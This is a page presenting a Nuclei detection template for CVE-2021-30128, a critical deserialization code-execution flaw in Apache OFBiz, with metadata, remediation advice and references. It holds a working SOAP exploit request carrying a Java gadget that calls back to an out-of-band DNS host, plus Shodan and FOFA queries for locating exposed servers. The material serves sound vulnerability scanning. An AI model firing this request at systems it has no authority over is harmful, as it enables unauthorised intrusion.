Apache OFBiz <17.12.07 - Arbitrary Code Execution

ID: CVE-2021-30128

Severity: critical

Author: For3stCo1d

Tags: cve2021,cve,apache,ofbiz,deserialization,rce

Description

Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.

YAML Source

id: CVE-2021-30128

info:
  name: Apache OFBiz <17.12.07 - Arbitrary Code Execution
  author: For3stCo1d
  severity: critical
  description: Apache OFBiz before 17.12.07 is susceptible to arbitrary code execution via unsafe deserialization. An attacker can modify deserialized data or code without using provided accessor functions.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
  remediation: |
    Upgrade Apache OFBiz to version 17.12.07 or later to mitigate this vulnerability.
  reference:
    - https://lists.apache.org/thread.html/rbe8439b26a71fc3b429aa793c65dcc4a6e349bc7bb5010746a74fa1d@%3Ccommits.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743%40%3Cdev.ofbiz.apache.org%3E
    - https://lists.apache.org/thread.html/rb3f5cd65f3ddce9b9eb4d6ea6e2919933f0f89b15953769d11003743@%3Cdev.ofbiz.apache.org%3E
    - https://nvd.nist.gov/vuln/detail/CVE-2021-30128
    - http://www.openwall.com/lists/oss-security/2021/04/27/5
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-30128
    cwe-id: CWE-502
    epss-score: 0.59411
    epss-percentile: 0.97756
    cpe: cpe:2.3:a:apache:ofbiz:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: ofbiz
    shodan-query:
      - http.html:"ofbiz"
      - ofbiz.visitor=
    fofa-query:
      - app="Apache_OFBiz"
      - body="ofbiz"
      - app="apache_ofbiz"
  tags: cve2021,cve,apache,ofbiz,deserialization,rce

http:
  - raw:
      - |
        POST /webtools/control/SOAPService HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/xml

        <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ser="http://ofbiz.apache.org/service/">
          <soapenv:Header/>
            <soapenv:Body>
              <ser>
                <map-Map>
                  <map-Entry>
                    <map-Key>
                      <cus-obj>{{generate_java_gadget("dns", "https://{{interactsh-url}}", "hex")}}</cus-obj>
                    </map-Key>
                  <map-Value>
                <std-String/>
                </map-Value>
                </map-Entry>
              </map-Map>
              </ser>
            </soapenv:Body>
        </soapenv:Envelope>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "dns"

      - type: word
        part: body
        words:
          - 'value="errorMessage"'
# digest: 4b0a00483046022100895e3b285657798274c14437a1e20dfb59c46e1d6d8c3ab2157901cb980da53902210090ac40b1438654f2c302c4e6525145e42a8b7cf1150e251f2dc6b36193b90e84:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

$ nuclei -u "URL" -t "http/cves/2021/CVE-2021-30128.yaml"

View on Github